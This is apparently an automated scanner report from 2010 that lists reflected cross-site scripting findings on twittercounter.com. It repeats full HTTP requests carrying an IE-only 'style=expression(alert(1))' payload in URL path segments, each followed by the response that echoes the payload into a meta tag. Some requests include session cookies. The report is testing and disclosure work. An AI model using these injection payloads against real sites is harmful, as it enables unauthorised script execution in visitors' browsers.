GET /rafadefine682365/listc5bbc"style%3d"x%3aexpression(alert(1))"69d1c54505a/topbrasil-helphaiti HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:32 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23672
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/rafadefine682365/listc5bbc"style="x:expression(alert(1))"69d1c54505a/topbrasil-helphaiti" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8a0e"style%3d"x%3aexpression(alert(1))"3026661137f was submitted in the REST URL parameter 3. This input was echoed as c8a0e"style="x:expression(alert(1))"3026661137f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /rafadefine682365/list/topbrasil-helphaitic8a0e"style%3d"x%3aexpression(alert(1))"3026661137f HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:39 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12947
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/rafadefine682365/list/topbrasil-helphaitic8a0e"style="x:expression(alert(1))"3026661137f" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc344"style%3d"x%3aexpression(alert(1))"533211075c5 was submitted in the REST URL parameter 1. This input was echoed as cc344"style="x:expression(alert(1))"533211075c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /rainorshine86cc344"style%3d"x%3aexpression(alert(1))"533211075c5 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:28:29 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23726
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/rainorshine86cc344"style="x:expression(alert(1))"533211075c5" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88ff8"style%3d"x%3aexpression(alert(1))"f0f0125e113 was submitted in the REST URL parameter 1. This input was echoed as 88ff8"style="x:expression(alert(1))"f0f0125e113 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ranceblackmetal88ff8"style%3d"x%3aexpression(alert(1))"f0f0125e113?from=widget&v=2 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:28:44 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23672
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/ranceblackmetal88ff8"style="x:expression(alert(1))"f0f0125e113" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 533a2"style%3d"x%3aexpression(alert(1))"bd0e5b5033c was submitted in the REST URL parameter 1. This input was echoed as 533a2"style="x:expression(alert(1))"bd0e5b5033c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1395e"style%3d"x%3aexpression(alert(1))"1eb45959a9f was submitted in the REST URL parameter 1. This input was echoed as 1395e"style="x:expression(alert(1))"1eb45959a9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /remote1395e"style%3d"x%3aexpression(alert(1))"1eb45959a9f/authenticate.php HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:00 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/remote1395e"style="x:expression(alert(1))"1eb45959a9f/authenticate.php" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54de2"style%3d"x%3aexpression(alert(1))"34c3c59f2b8 was submitted in the REST URL parameter 2. This input was echoed as 54de2"style="x:expression(alert(1))"34c3c59f2b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /remote/authenticate.php54de2"style%3d"x%3aexpression(alert(1))"34c3c59f2b8 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:04 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22279
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/remote/authenticate.php54de2"style="x:expression(alert(1))"34c3c59f2b8" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67d03"style%3d"x%3aexpression(alert(1))"f1ad50ea1f5 was submitted in the REST URL parameter 1. This input was echoed as 67d03"style="x:expression(alert(1))"f1ad50ea1f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cd3e"style%3d"x%3aexpression(alert(1))"840be4a9212 was submitted in the REST URL parameter 2. This input was echoed as 3cd3e"style="x:expression(alert(1))"840be4a9212 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36e77"style%3d"x%3aexpression(alert(1))"8e7d4a03998 was submitted in the REST URL parameter 1. This input was echoed as 36e77"style="x:expression(alert(1))"8e7d4a03998 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /remote36e77"style%3d"x%3aexpression(alert(1))"8e7d4a03998/login.php HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:22:55 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23849
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/remote36e77"style="x:expression(alert(1))"8e7d4a03998/login.php" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 117ef"style%3d"x%3aexpression(alert(1))"6a292fa9465 was submitted in the REST URL parameter 2. This input was echoed as 117ef"style="x:expression(alert(1))"6a292fa9465 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /remote/login.php117ef"style%3d"x%3aexpression(alert(1))"6a292fa9465 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:02 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/remote/login.php117ef"style="x:expression(alert(1))"6a292fa9465" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d85dd"style%3d"x%3aexpression(alert(1))"dff0703bfe4 was submitted in the REST URL parameter 1. This input was echoed as d85dd"style="x:expression(alert(1))"dff0703bfe4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /remoted85dd"style%3d"x%3aexpression(alert(1))"dff0703bfe4/tweet.php HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:30:36 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/remoted85dd"style="x:expression(alert(1))"dff0703bfe4/tweet.php" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f765d"style%3d"x%3aexpression(alert(1))"dbc9fe88438 was submitted in the REST URL parameter 2. This input was echoed as f765d"style="x:expression(alert(1))"dbc9fe88438 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /remote/tweet.phpf765d"style%3d"x%3aexpression(alert(1))"dbc9fe88438 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:30:40 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22274
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/remote/tweet.phpf765d"style="x:expression(alert(1))"dbc9fe88438" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a984"style%3d"x%3aexpression(alert(1))"d8fa7d7c716 was submitted in the REST URL parameter 1. This input was echoed as 4a984"style="x:expression(alert(1))"d8fa7d7c716 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /rosarinn4a984"style%3d"x%3aexpression(alert(1))"d8fa7d7c716 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:28:53 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23670
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/rosarinn4a984"style="x:expression(alert(1))"d8fa7d7c716" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c2f4"style%3d"x%3aexpression(alert(1))"b7c34f526 was submitted in the REST URL parameter 1. This input was echoed as 1c2f4"style="x:expression(alert(1))"b7c34f526 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /rui1781c2f4"style%3d"x%3aexpression(alert(1))"b7c34f526 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:28:57 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23596
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/rui1781c2f4"style="x:expression(alert(1))"b7c34f526" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf85"style%3d"x%3aexpression(alert(1))"1297d9864a1 was submitted in the REST URL parameter 1. This input was echoed as 5bf85"style="x:expression(alert(1))"1297d9864a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /selenagomez5bf85"style%3d"x%3aexpression(alert(1))"1297d9864a1 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:28:59 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/selenagomez5bf85"style="x:expression(alert(1))"1297d9864a1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6993"style%3d"x%3aexpression(alert(1))"3c446d8a09e was submitted in the REST URL parameter 1. This input was echoed as e6993"style="x:expression(alert(1))"3c446d8a09e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /shakirae6993"style%3d"x%3aexpression(alert(1))"3c446d8a09e HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:06 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23722
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/shakirae6993"style="x:expression(alert(1))"3c446d8a09e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68392"style%3d"x%3aexpression(alert(1))"1f1e2152f87 was submitted in the REST URL parameter 1. This input was echoed as 68392"style="x:expression(alert(1))"1f1e2152f87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /siteopt.js68392"style%3d"x%3aexpression(alert(1))"1f1e2152f87?v=1&utmxkey= HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:23 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23637
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/siteopt.js68392"style="x:expression(alert(1))"1f1e2152f87" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9033d"style%3d"x%3aexpression(alert(1))"4e57e5e625e was submitted in the REST URL parameter 1. This input was echoed as 9033d"style="x:expression(alert(1))"4e57e5e625e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /smallbiztrends9033d"style%3d"x%3aexpression(alert(1))"4e57e5e625e HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:21 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23918
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/smallbiztrends9033d"style="x:expression(alert(1))"4e57e5e625e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cd6d"style%3d"x%3aexpression(alert(1))"71983893dab was submitted in the REST URL parameter 1. This input was echoed as 8cd6d"style="x:expression(alert(1))"71983893dab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
